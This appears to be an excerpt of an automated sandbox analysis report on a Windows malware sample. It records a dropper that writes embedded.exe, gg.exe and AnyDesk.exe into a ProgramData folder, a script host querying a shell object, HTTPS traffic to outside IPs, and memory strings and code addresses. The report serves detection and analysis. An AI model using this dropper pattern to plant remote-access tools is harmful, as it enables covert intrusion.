                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://my.anydesk.com/auth/realms/myanydesk/login-actions/reset-credentials
                                Source: AnyDesk.exe, 00000010.00000002.2890701481.0000000003FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://my.anydesk.com/auth/realms/myanydesk/login-actions/reset-credentials?client_id=myanydesk-fro
                                Source: AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://my.anydesk.com/auth/realms/myanydesk/protocol/openid-connect/registrations?client_id=myanyde
                                Source: AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://my.anydesk.com/password-generator.
                                Source: AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://my.anydesk.com/v2
                                Source: AnyDesk.exe, 00000010.00000002.2891142994.00000000043E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://my.anydesk.com/v2e
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://order.anydesk.com/trial
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://policies.google.com/privacy?hl=$
                                Source: AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://support.anydesk.com
                                Source: AnyDesk.exe, 00000010.00000002.2891142994.00000000043E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/account-migration
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/anydesk-account
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1664812731.0000000004060000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmp, AnyDesk.exe, 00000010.00000002.2890701481.0000000003FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/anydesk-for-android-chromeos#troubleshooting
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmp, AnyDesk.exe, 00000010.00000002.2888492265.0000000001D88000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2890701481.0000000003FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/anydesk-id-and-alias
                                Source: AnyDesk.exe, 00000010.00000002.2890701481.0000000003FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/anydesk-id-and-alias#
                                Source: AnyDesk.exe, 00000010.00000002.2890701481.0000000003FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/anydesk-id-and-aliasc
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1664857020.0000000004086000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/my-anydesk-ii#user-management
                                Source: AnyDesk.exe, 00000010.00000002.2890701481.0000000003FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/quick-start-guide
                                Source: AnyDesk.exe, 00000010.00000002.2890701481.0000000003FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/quick-start-guide%
                                Source: AnyDesk.exe, 00000010.00000002.2890701481.0000000003FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/quick-start-guide4
                                Source: AnyDesk.exe, 00000010.00000002.2890701481.0000000003FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/quick-start-guideN
                                Source: AnyDesk.exe, 00000010.00000002.2888492265.0000000001E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/quick-start-guideU
                                Source: AnyDesk.exe, 00000010.00000002.2890701481.0000000003FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/quick-start-guidea
                                Source: AnyDesk.exe, 00000010.00000002.2891142994.00000000043E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/quick-start-guideoq
                                Source: AnyDesk.exe, 00000010.00000002.2890701481.0000000003FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/quick-start-guidep
                                Source: AnyDesk.exe, 00000010.00000002.2891142994.00000000043E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/quick-start-guidewJ
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/status-anynet_overload
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/status-desk_rt_auto_disconnect
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/status-desk_rt_ipc_error
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmp, AnyDesk.exe, 00000010.00000002.2890701481.0000000003FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/the-session-has-ended-unexpectedly
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/users
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/waiting-for-image-black-screen
                                Source: AnyDesk.exe, 00000010.00000002.2890701481.0000000003FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/waiting-for-image-black-screenh
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/what-is-full-client-management
                                Source: AnyDesk.exeString found in binary or memory: https://support.google.com/chrome/contact/chromeuninstall3?hl=$1
                                Source: gg.exe, 0000000E.00000002.1811038264.0000000003F5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                                Source: gg.exe, 0000000E.00000002.1811038264.0000000003F5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://www.google.com/intl/$
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://www.nayuki.io/page/qr-code-generator-library
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                                Source: unknownHTTPS traffic detected: 185.229.191.44:443 -> 192.168.2.4:49731 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 64.31.23.26:443 -> 192.168.2.4:49733 version: TLS 1.2
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DirectDrawCreateExmemstr_e8dd2a33-3
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_3943cece-8

                                System Summary

                                barindex
                                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C3B6C0 new,SetHandleInformation,CreateEnvironmentBlock,CreateProcessAsUserW,DestroyEnvironmentBlock,CreateProcessW,AssignProcessToJobObject,GetCurrentProcess,GetCurrentProcess,TerminateProcess,GetCurrentProcess,WaitForSingleObject,ResumeThread,WaitForSingleObject,19_2_69C3B6C0
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeCode function: 0_2_00000231DA96D7AB0_2_00000231DA96D7AB
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeCode function: 0_2_00000231DA96D4480_2_00000231DA96D448
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeCode function: 0_2_00000231DA95F2940_2_00000231DA95F294
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeCode function: 0_2_00000231DA9573C40_2_00000231DA9573C4
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeCode function: 0_2_00000231DA9753CE0_2_00000231DA9753CE
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeCode function: 0_2_00000231DA9568B80_2_00000231DA9568B8
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeCode function: 0_2_00000231DA95711C0_2_00000231DA95711C
                                Source: C:\ProgramData\WinNet\embedded.exeCode function: 7_2_000001A0BB5657AB7_2_000001A0BB5657AB
                                Source: C:\ProgramData\WinNet\embedded.exeCode function: 7_2_000001A0BB54F11C7_2_000001A0BB54F11C
                                Source: C:\ProgramData\WinNet\embedded.exeCode function: 7_2_000001A0BB54E8B87_2_000001A0BB54E8B8
                                Source: C:\ProgramData\WinNet\embedded.exeCode function: 7_2_000001A0BB54F3C47_2_000001A0BB54F3C4
                                Source: C:\ProgramData\WinNet\embedded.exeCode function: 7_2_000001A0BB56D3CE7_2_000001A0BB56D3CE
                                Source: C:\ProgramData\WinNet\embedded.exeCode function: 7_2_000001A0BB5654487_2_000001A0BB565448
                                Source: C:\ProgramData\WinNet\embedded.exeCode function: 7_2_000001A0BB5572947_2_000001A0BB557294
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 14_2_02A2DC7414_2_02A2DC74
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 14_2_065B9FB014_2_065B9FB0
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 14_2_065BFBE014_2_065BFBE0
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 14_2_065BD6D814_2_065BD6D8
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 14_2_065BD6C914_2_065BD6C9
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 14_2_065B0F1014_2_065B0F10
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 14_2_065B9FA114_2_065B9FA1
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 14_2_065B847814_2_065B8478
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 14_2_065B4D2814_2_065B4D28
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 14_2_065BCDC014_2_065BCDC0
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 14_2_065BCDB014_2_065BCDB0
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 14_2_065B4A0814_2_065B4A08
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 14_2_065BFBD114_2_065BFBD1
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 14_2_065BF82014_2_065BF820
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 14_2_065B898114_2_065B8981
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 18_2_030EDC7418_2_030EDC74
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 18_2_0654950818_2_06549508
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 18_2_065463A818_2_065463A8
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 18_2_0654BE7818_2_0654BE78
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 18_2_06549E2018_2_06549E20
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 18_2_0654ED2918_2_0654ED29
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 18_2_06545AD818_2_06545AD8
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 18_2_0654CB2818_2_0654CB28
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 18_2_065408E818_2_065408E8
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 18_2_0654A89818_2_0654A898
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 18_2_0654579018_2_06545790
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 18_2_0654BE6818_2_0654BE68
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 18_2_065408D718_2_065408D7
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C439A419_2_69C439A4
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C44B2219_2_69C44B22
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C35D1019_2_69C35D10
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C47F4E19_2_69C47F4E
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C41ED019_2_69C41ED0
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C43EA019_2_69C43EA0
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C4AE2019_2_69C4AE20
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C4817D19_2_69C4817D
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C2A09019_2_69C2A090
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C5309319_2_69C53093
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C403B719_2_69C403B7
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C5230119_2_69C52301
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C442B819_2_69C442B8
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C3458019_2_69C34580
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C5851719_2_69C58517
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C556C919_2_69C556C9
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C446ED19_2_69C446ED
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_0175DC7424_2_0175DC74
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_063F969824_2_063F9698
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_063FD6D924_2_063FD6D9
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_063F9FD024_2_063F9FD0
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_063FBA7824_2_063FBA78
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_063F6AB024_2_063F6AB0
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_063F832024_2_063F8320
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_063FC82024_2_063FC820
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_063FC0B824_2_063FC0B8
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_063F08E824_2_063F08E8
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_063F912824_2_063F9128
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_063FF9B824_2_063FF9B8
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_063FA99B24_2_063FA99B
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_063F61E024_2_063F61E0
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_063F5E9824_2_063F5E98
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_063F968B24_2_063F968B
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_063FBA6924_2_063FBA69
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_063FC0A824_2_063FC0A8
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_063F08D824_2_063F08D8
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_063FE1E024_2_063FE1E0
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_065FC48824_2_065FC488
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_065FDF0024_2_065FDF00
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_065F422024_2_065F4220
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_065FF89024_2_065FF890
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_065FF88024_2_065FF880
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_0662B5B824_2_0662B5B8
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_0662726024_2_06627260
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_066292C824_2_066292C8
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_0662B17824_2_0662B178
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_0662652824_2_06626528
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_0662C5C024_2_0662C5C0
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_06628C5824_2_06628C58
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_0662B9F024_2_0662B9F0
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_0663900124_2_06639001
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_0666926C24_2_0666926C
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_0666E2C024_2_0666E2C0
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_066651B024_2_066651B0
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_06664A3024_2_06664A30
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_0666926C24_2_0666926C
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_0666926C24_2_0666926C
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_06693EE024_2_06693EE0
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_0669E53824_2_0669E538
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_0669134924_2_06691349
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_0669131024_2_06691310
                                Source: Joe Sandbox ViewDropped File: C:\ProgramData\WinNet\gcapi.dll 73170761D6776C0DEBACFBBC61B6988CB8270A20174BF5C049768A264BB8FFAF
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: String function: 69C22EA0 appears 47 times
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: String function: 69C22340 appears 31 times
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: String function: 69C26EC0 appears 51 times
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: String function: 69C3FC11 appears 50 times
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: String function: 69C41630 appears 48 times
                                Source: AnyDesk.exe.7.drStatic PE information: No import functions for PE file found
                                Source: SysrI6zSkJ.exe, 00000000.00000002.2883966376.00000231D8F41000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAstutest.exe8 vs SysrI6zSkJ.exe
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\ProgramData\WinNet\embedded.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\ProgramData\WinNet\embedded.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\embedded.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\ProgramData\WinNet\embedded.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dll
